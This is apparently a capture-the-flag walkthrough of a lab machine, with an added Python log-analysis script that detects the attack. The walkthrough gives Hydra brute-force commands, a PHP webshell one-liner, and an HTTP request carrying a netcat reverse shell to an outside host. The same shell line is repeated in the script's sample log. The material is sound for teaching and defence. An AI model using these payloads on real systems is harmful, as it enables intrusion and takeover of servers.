
Only the HTTP and HTTPS ports are open.


After some time it also found the directory /secure_notes.



The /department directory redirects the user to a login page.




Hydra syntax for brute-forcing the login pages:
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"


Now that I am authenticated, I can try to leverage my previous findings:
https://www.exploit-db.com/exploits/24044
First, create a new database:

Create a new table:



I went back to my other Hydra brute force.
I created the table again and added the same payload in the Field and Default Value:

<?php system($_GET["cmd"]); ?>




URL-encode this reverse shell payload:

GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.7+2222+>/tmp/f HTTP/1.1
Host: 10.10.10.43
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=be3n40q3kq5mi26sdhu02580p3
Upgrade-Insecure-Requests: 1
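The password guessing from the Hydra commands and the webshell request above both leave a clear trace in the web server's access log. The following is an added example (not part of the original writeup) that flags both in Apache combined-format log lines; the sample lines are constructed for the example, reusing the paths and the 10.10.14.7 address from the writeup, and the brute-force threshold is an assumed value.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache combined log prefix: client IP, method, request target and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Heuristic markers of a shell command smuggled into a query parameter.
SHELL_RE = re.compile(r'(mkfifo|/bin/sh|/dev/tcp|\bnc\b|\bbash\b)')
LOGIN_PATHS = ("/department/login.php", "/db/index.php")
BRUTE_THRESHOLD = 20  # assumed: tune to the site's real login traffic

def parse(line):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def webshell_hits(lines):
    """(ip, path, parameter) for each request whose query carries a shell command."""
    hits = []
    for rec in filter(None, map(parse, lines)):
        url = urlsplit(rec["target"])
        # parse_qs splits on '&' before percent-decoding, so the encoded
        # '%26' inside '2>&1' does not break the parameter apart.
        for name, values in parse_qs(url.query).items():
            if any(SHELL_RE.search(v) for v in values):
                hits.append((rec["ip"], url.path, name))
    return hits

def brute_force_sources(lines, threshold=BRUTE_THRESHOLD):
    """Client IPs that POST to a login endpoint more than `threshold` times."""
    counts = Counter()
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "POST" and urlsplit(rec["target"]).path in LOGIN_PATHS:
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n > threshold}

# Constructed sample: 25 password guesses, the writeup's webshell request, one benign request.
SAMPLE_LOG = (
    ['10.10.14.7 - - [10/Jul/2021:12:00:%02d +0000] "POST /department/login.php HTTP/1.1" 200 512' % i
     for i in range(25)]
    + ['10.10.14.7 - - [10/Jul/2021:12:01:00 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php'
       '&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.7+2222+>/tmp/f HTTP/1.1" 200 0']
    + ['10.10.14.9 - - [10/Jul/2021:12:02:00 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 300']
)

if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_LOG))  # {'10.10.14.7': 25}
    print(webshell_hits(SAMPLE_LOG))        # [('10.10.14.7', '/department/manage.php', 'cmd')]
```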


I ran linpeas.



I took the text from this output and googled it. It is chkrootkit.

From the gobuster scan of the HTTPS main directory I found another location:




I couldn't use the SSH key to log in from my own box, because the SSH port is listening only locally. I could try to forward this port, but there are probably firewall rules which block port 22 from being opened to the outside.
I ran linpeas as the amrois user.



I will check this vulnerability in two ways:
- adding the sticky bit to bash as root
- sending a reverse shell to my host



Both ways worked, so to be honest I didn't need to get the user first: I could have escalated my privileges from the www-data user straight to root without getting user access.